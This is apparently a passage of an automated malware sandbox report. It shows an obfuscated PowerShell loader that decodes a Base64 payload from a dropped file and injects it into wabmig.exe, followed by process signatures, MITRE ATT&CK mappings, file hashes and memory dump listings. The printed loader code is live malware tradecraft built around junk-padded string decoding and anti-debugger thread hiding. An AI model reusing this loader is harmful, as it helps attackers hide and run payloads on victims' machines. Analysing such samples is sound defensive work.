lTuns,enippsEkl.tKbsl-madvPHoldaLag tFuldh nc Un r$AfflIForrnBa ec HjhaTaurp NonaSchwcBkrriBrygtCongaBountLolleMann)N,ri ') ;Selvtugten (godkendelsesbefjelsernes 'Ek p$FiltgTaenlConco S nbIntraFanelTra.:Gu sCRacqe DismAf eb SkvaKlagl S yo Inte OvetMaxisPles=Meta$ ReggFremlBlo,oHannbSpadaShorlMult: tpaP .atlAtomoSkatu imptSg n+Plan+Pe.e%,kra$RenuU MotdStime ascnTidseBon,uAnslrFuzzoEgespNonfiLys.spro,kStraeVar somf,.skydcCa aoFrusuIntenBowetP ed ') ;$Kompasnaals=$Udeneuropiskes[$Cembaloets];}$Monkishly=280932;$Besknkendes=28841;Selvtugten (godkendelsesbefjelsernes 'Invo$FlaggMammlMaanoSlgtbBeasaSprilVolu:Br dM rfloBeskd UndeP.rnm ParpHonorTilfoRdbyg G.yr M la aymSupemBoareBeretAleb Eksp=Folk BrdfGGal eEvant etc-ToccCIrr.oRebrnFre.t De.e iscnNovetBrut npl$S mmITil nFil c eiaOpsppS aua Frec PoliSk ktSamna.ountEmuseGuam ');Selvtugten (godkendelsesbefjelsernes 'Acep$DravgWel,lArano,nslbsocia.artlDish:al.oTSqexaForsaDe flSkilbLia o CebnFemid ,ap d sh=mani Idi[ S lSPredyUnswsmanntCouneIndfmTri .A ioCFratoP.isnPrervun neSacrrMalmtTakk]Alts: Scr:SrilF YtrrTrbeo G amProgB De aStapsn koe ndv6Blod4TylsSIsist SekrSnesiReo,nFo.egSvir(Nedl$ B rM Lino .pod,inkeArm mxenepAnthrld loverdg LaerFoggaSstem Slkm Ca e mist mpe)epid ');Selvtugten (godkendelsesbefjelsernes ' Ers$Sacrg S.llS orosn kbLa aabruglFi,f:pe lhfygei SatjUndeaAabncPlurkbilae ekar.istnGenieS,rrsNati Unde=Mult Fo s[TranSUnhoyFir sSaddtMiche Funmskro.HoloTSikke R sxSulftSarc.BjerEF rrnM.tacRobboUlmed UroiObj,n eftgTota]Tes,:Koll:Fo,lAOrolSKompCAmphIProgIMyo .KontGDocie Undt CenSpreat Phir Stri Godn StagMini(Smda$D meToplaahvira MinlSalabSlyno U,gnPjatdQuin)Spar ');Selvtugten (godkendelsesbefjelsernes 'Do.i$ hotgBeedlAry oFloubp rpa kitlEnde: Un N prjoStjenFjo.cUncioSa.anFlaacRogue ProsTyphsHijii riv BogePriv1.ndu7Skaa7fu i=Sk,p$ Ti,hFarciBo.djKirka M,pc rgkNonseanotrTegnnSeleeAut sElev. C ns Genu Hj.bReprsMisptOutsrE aeiUdr n.oilgDepe( Dun$TituMAlauo .venExcrkSociiCil.sP ech.leal ndpySyst,Dybv$Pl.dBGenie Ti,sF sskPrisnPr.nk,ikme UnpnUho dOpsteemits urg)D.ss ');Selvtugten $Nonconcessive177;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      System Time Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4860
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Separatisme.Cou && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1356
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:2868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

System Time Discovery

1

T1124

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fibthcf5.r04.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Separatisme.Cou

Filesize
403KB

MD5
030a6f6849b60c1b6dda2867d97bf99c

SHA1
f7879cbed1fd28d8110e6d4fb1a0437a9c541428

SHA256
6cb8fc9218ae33c2fb8a2194d38e4ceb22ea7f96444e81e1478d0d82db379423

SHA512
feeead829619beb404fd815ff39b8388a66ce2e6671bb281a157ebb7201caf4b2e30a6bf3d0d2a887f1378e08a5eed30c45cde22ce4f950c3972862e64bbcbd8

Download Submit
memory/2868-65-0x0000000023900000-0x000000002399C000-memory.dmp

Filesize
624KB

Download
memory/2868-63-0x00000000010E0000-0x0000000002334000-memory.dmp

Filesize
18.3MB

Download
memory/2868-64-0x00000000010E0000-0x0000000001102000-memory.dmp

Filesize
136KB

Download
memory/2868-50-0x00000000010E0000-0x0000000002334000-memory.dmp

Filesize
18.3MB

Download
memory/2868-48-0x0000000002340000-0x00000000058EC000-memory.dmp

Filesize
53.7MB

Download
memory/4860-44-0x00000000087F0000-0x0000000008D94000-memory.dmp

Filesize
5.6MB

Download
memory/4860-41-0x0000000007580000-0x000000000759A000-memory.dmp

Filesize
104KB

Download
memory/4860-23-0x0000000002B20000-0x0000000002B56000-memory.dmp

Filesize
216KB

Download
memory/4860-24-0x00000000055F0000-0x0000000005C18000-memory.dmp

Filesize
6.2MB

Download
memory/4860-25-0x0000000005470000-0x0000000005492000-memory.dmp

Filesize
136KB

Download
memory/4860-26-0x0000000005C90000-0x0000000005CF6000-memory.dmp

Filesize
408KB

Download
memory/4860-27-0x0000000005D70000-0x0000000005DD6000-memory.dmp

Filesize
408KB

Download
memory/4860-37-0x0000000005E20000-0x0000000006174000-memory.dmp

Filesize
3.3MB

Download
memory/4860-38-0x0000000006420000-0x000000000643E000-memory.dmp

Filesize
120KB

Download
memory/4860-39-0x0000000006460000-0x00000000064AC000-memory.dmp

Filesize
304KB

Download
memory/4860-40-0x0000000007BC0000-0x000000000823A000-memory.dmp

Filesize
6.5MB

Download
memory/4860-46-0x0000000008DA0000-0x000000000C34C000-memory.dmp

Filesize
53.7MB

Download
memory/4860-42-0x00000000076C0000-0x0000000007756000-memory.dmp

Filesize
600KB

Download
memory/4860-43-0x0000000007650000-0x0000000007672000-memory.dmp

Filesize
136KB

Download
memory/4964-4-0x00007FF9C4C83000-0x00007FF9C4C85000-memory.dmp

Filesize
8KB

Download
memory/4964-20-0x00007FF9C4C80000-0x00007FF9C5741000-memory.dmp

Filesize
10.8MB

Download
memory/4964-22-0x00007FF9C4C80000-0x00007FF9C5741000-memory.dmp

Filesize
10.8MB

Download
memory/4964-47-0x00007FF9C4C80000-0x00007FF9C5741000-memory.dmp

Filesize
10.8MB

Download
memory/4964-19-0x00007FF9C4C80000-0x00007FF9C5741000-memory.dmp

Filesize
10.8MB

Download
memory/4964-18-0x00007FF9C4C83000-0x00007FF9C4C85000-memory.dmp

Filesize
8KB

Download
memory/4964-16-0x00007FF9C4C80000-0x00007FF9C5741000-memory.dmp

Filesize
10.8MB

Download
memory/4964-15-0x00007FF9C4C80000-0x00007FF9C5741000-memory.dmp

Filesize
10.8MB

Download
memory/4964-5-0x000001F536D30000-0x000001F536D52000-memory.dmp

Filesize
136KB

Download
memory/4964-68-0x00007FF9C4C80000-0x00007FF9C5741000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads